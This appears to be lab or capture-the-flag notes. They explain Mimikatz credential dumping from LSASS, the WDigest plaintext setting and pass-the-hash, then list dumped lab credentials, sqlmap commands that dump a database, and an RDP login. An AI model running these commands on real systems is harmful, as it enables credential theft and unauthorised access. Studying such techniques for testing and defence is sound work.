mimikatz

The process of extracting clear-text passwords starts by invoking the debug command from the privilege module. Despite the way it is usually described, this does not elevate anything: it enables the SeDebugPrivilege that an administrator's token already holds but that Windows leaves disabled by default, and Mimikatz needs that privilege to open the LSASS process and read its memory. It looks like this:

mimikatz # privilege::debug

Privilege '20' OK

'20' is the LUID of SeDebugPrivilege. From a shell that is not running as an administrator the call fails instead with ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061 (STATUS_PRIVILEGE_NOT_HELD), and the sekurlsa commands that follow will then be unable to open LSASS.

To record a log of Mimikatz interactions and results, enter:

mimikatz # log

Using 'mimikatz.log' for logfile : OK

The default log file is mimikatz.log in the current working directory, but you can pass another file name as an argument. For example:

mimikatz # log customlogfilename.log

Once logging is turned on, every command and its output for the rest of the session is appended to that file, so the file, not the console buffer, is what you take off the box for exfiltration or analysis.

Perhaps the simplest and most productive command is the one that dumps the credentials LSASS holds in memory, lists them on the console and, with logging on, writes them to the log file.

mimikatz # sekurlsa::logonpasswords

The logonpasswords command walks every logon session LSASS still has in memory (currently logged-in users, plus recent logons and service accounts whose sessions have not been torn down) and prints, per session, the user name and domain together with whatever each security package cached: the NTLM and SHA1 hashes from msv, and the plaintext password from wdigest, kerberos or tspkg when one is cached. On Windows 8.1 / Server 2012 R2 and later (and on older hosts with KB2871997 installed) WDigest no longer caches plaintext by default, so those Password fields read (null) unless HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential has been set to 1; the NTLM hash is still returned, and that alone is enough for pass-the-hash. LSA protection (RunAsPPL) or Credential Guard stops the dump altogether.

The sekurlsa module includes other commands to extract Kerberos tickets and encryption keys (sekurlsa::tickets, sekurlsa::ekeys), and sekurlsa::pth performs a pass-the-hash (over-pass-the-hash) attack by starting a process whose logon session is backed by an NTLM hash Mimikatz extracted rather than a password.

| id | password                         | username       |
+----+----------------------------------+----------------+
| 1  | WoWmAgE60                        | b.mocarthy     |
| 2  | 0912jgf93FSnjf                   | artica-ftp-acc |
| 3  | 3e46e7561ee64c719441df8da76bf715 | flag           |

sqlmap -u http://10.10.102.92/all_messages?to=1 --dbs

Once I found the table, just:

sqlmap -u http://10.10.102.92/all_messages?to=1 -D artica -T windows_directory --dump

rdp

xfreerdp /bpp:32 /gfx +aero +fonts /d:artica /u:fax_acc /v:10.10.102.105